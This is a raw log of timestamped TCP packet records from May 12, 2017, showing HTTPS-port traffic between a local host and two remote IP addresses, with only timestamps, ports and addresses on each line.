May 12, 2017 18:54:27.631021023 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.631036997 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.631042004 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.631139040 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.645970106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.645994902 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.646003962 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.646034956 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.646069050 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.646085024 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.646162987 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.646178961 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.646249056 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.646264076 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.663516998 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.663535118 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.663655043 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.663683891 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.664519072 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.664536953 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.664670944 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.664680004 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.664690018 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.664705992 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.664719105 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.664777040 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.666332006 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.672447920 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.672672987 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:54:27.672840118 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.693624973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.693732977 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.693754911 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.693772078 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.693790913 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.693898916 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.693917036 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.703413010 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.703438997 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.703550100 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.703567982 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.706624031 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.706648111 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.706777096 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.706804991 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.713280916 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.713310957 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.713473082 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.713502884 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.721640110 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.721663952 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.721815109 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.721836090 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.721834898 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.721853018 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.721889973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.721981049 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.722624063 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.722650051 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.722666979 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.722815990 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.723201036 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.739255905 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.739281893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.739299059 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.739444971 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.739758015 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.739783049 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.739799023 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.739913940 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.748516083 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.748536110 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.748553991 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.748636961 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.758407116 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.758420944 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.758430958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.758605003 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.767102957 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.767122030 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.767127037 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.767240047 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.767241955 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.767256975 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.767287016 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.767330885 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.767646074 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.788604975 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.788732052 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.788752079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.798424006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.798443079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.798521996 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.798542976 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.806567907 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.806581974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.806652069 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.806669950 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.808166027 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.808191061 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.808289051 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.808307886 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.817814112 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.817842007 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.817928076 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.817948103 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.824610949 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.824623108 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.824690104 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.824708939 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.825005054 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.827120066 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.827132940 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.827214003 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.827233076 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.833791018 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.833803892 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.833880901 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.833900928 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.836482048 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.836496115 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.836579084 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.836597919 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.845874071 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.845886946 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.845978022 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.846002102 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.851870060 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.851892948 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.852001905 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.852021933 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.860388994 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.860403061 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.860452890 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.860474110 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.861188889 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.861202955 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.861255884 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.861270905 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.861367941 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.861761093 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.874533892 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.874550104 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.874557972 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.874645948 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.882649899 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.882664919 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.882677078 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.882750988 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.884140968 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.884171009 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.884238005 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.884268045 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.897655010 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.897670031 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.897730112 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.897753954 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.898520947 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.898817062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.898828983 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.898837090 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.898910999 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.905919075 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.905932903 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.905942917 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.906003952 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.907593966 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.907608032 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.907615900 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.907675982 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.908159018 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.908559084 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.908571959 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.908580065 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.908657074 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.916834116 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.916861057 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.916877985 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.916968107 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.917834997 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.917844057 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.917856932 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.918134928 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.925353050 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.925365925 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.925374031 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.925617933 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.927690029 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.927704096 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.927716970 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.927782059 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.933551073 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.933571100 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.933693886 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.933722973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.933741093 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.933753967 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.934283972 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.934310913 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.934884071 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.946811914 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.946835995 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.946845055 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.947021008 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.947051048 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.953670979 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.953696012 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.953799963 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.953823090 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.959028959 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.959053040 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.959108114 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.959122896 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.962937117 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.962960005 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.963032961 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.963046074 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.967148066 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.967170954 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.967246056 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.967262030 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.973227978 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.973248959 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.973285913 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.973304033 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.973645926 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.973718882 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.975562096 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.975661993 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.975673914 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.976177931 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.981514931 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.981529951 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.981554985 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.982338905 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.982563972 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.982578039 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.982589006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.982706070 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.991981030 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.992007971 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.992027044 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.992091894 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.992753983 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.992763996 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.992783070 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.993082047 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.998480082 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.998501062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.998506069 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.998595953 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.001310110 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.001323938 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.001354933 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.001441002 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.001773119 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.002034903 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.002048016 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.002064943 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.002547026 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.009789944 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.009820938 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.009829998 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.009993076 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.012051105 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.012140036 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.012155056 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.012722969 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.012743950 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.012767076 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.012794971 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.012824059 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.020284891 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.020298958 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.020530939 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.020562887 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.021789074 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.022063017 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.022094965 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.022106886 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.022186041 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.026417971 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.026433945 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.026448965 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.026669979 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.031402111 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.031416893 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.031424999 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.031611919 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.034810066 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.034826994 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.034837961 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.035020113 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.037075043 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.037089109 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.037096024 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.037180901 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.040888071 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.040909052 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.040927887 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.041018963 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.045464039 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.045485973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.045494080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.045633078 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.046329021 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.051772118 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.051786900 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.051796913 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.051914930 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.052417994 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.052438974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.052445889 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.052731991 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.058815002 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.058842897 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.058866024 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.060700893 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.061831951 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.061851978 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.061862946 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.062159061 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.071243048 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071260929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071278095 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071356058 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071367025 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.071569920 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.071609974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.072329998 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.072344065 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.072587967 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.072623968 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.073822021 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.074623108 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.084407091 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.084424973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.084453106 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.084574938 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.093501091 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.093527079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.093550920 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.093641043 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.094414949 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.094435930 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.094443083 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.094571114 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.103705883 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.103727102 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.103734970 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.103800058 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.108361006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.108381033 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.108392954 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.108509064 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.116760015 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.116786957 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.116803885 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.116950989 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.117707014 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.117732048 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.117744923 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.117883921 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.118158102 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.131680965 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.131706953 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.131720066 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.131827116 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.148926973 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.148947954 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.148956060 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.149072886 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.166949034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.166980982 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.167002916 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.167150021 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.175476074 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.175512075 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.175524950 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.175679922 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:28.176428080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.176476955 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.176486015 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:28.176598072 CEST49196443192.168.1.16131.188.40.189
